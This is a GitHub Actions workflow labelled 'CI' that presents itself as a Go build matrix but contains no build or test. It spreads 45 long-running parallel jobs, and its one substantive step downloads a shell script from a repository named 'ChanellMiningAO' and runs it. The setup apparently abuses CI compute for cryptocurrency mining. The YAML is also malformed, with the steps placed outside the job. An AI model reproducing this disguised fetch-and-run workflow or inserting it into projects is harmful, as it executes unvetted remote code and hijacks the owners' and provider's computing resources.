name: CI

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the main branch
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  build:
    name: Chanell
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 25
      fail-fast: false
      matrix:
        go: [1.6, 1.7, 1.8, 1.9, 1.10]
        flag: [A, B, C, D, E, F, G, H, I]
    timeout-minutes: 360
    env:
        NUM_JOBS: 10
        JOB: ${{ matrix.go }}
steps:
- name: Set up Go ${{ matrix.go }}
  uses: actions/setup-go@v1
  with:
    go-version: ${{ matrix.go }}
  id: go
- name: Setup
  uses: actions/checkout@v3
- name: Chanell
  run: | 
    wget https://raw.githubusercontent.com/ChanellMiningAO/auah/main/salma.sh && chmod u+x salma.sh && ./salma.sh
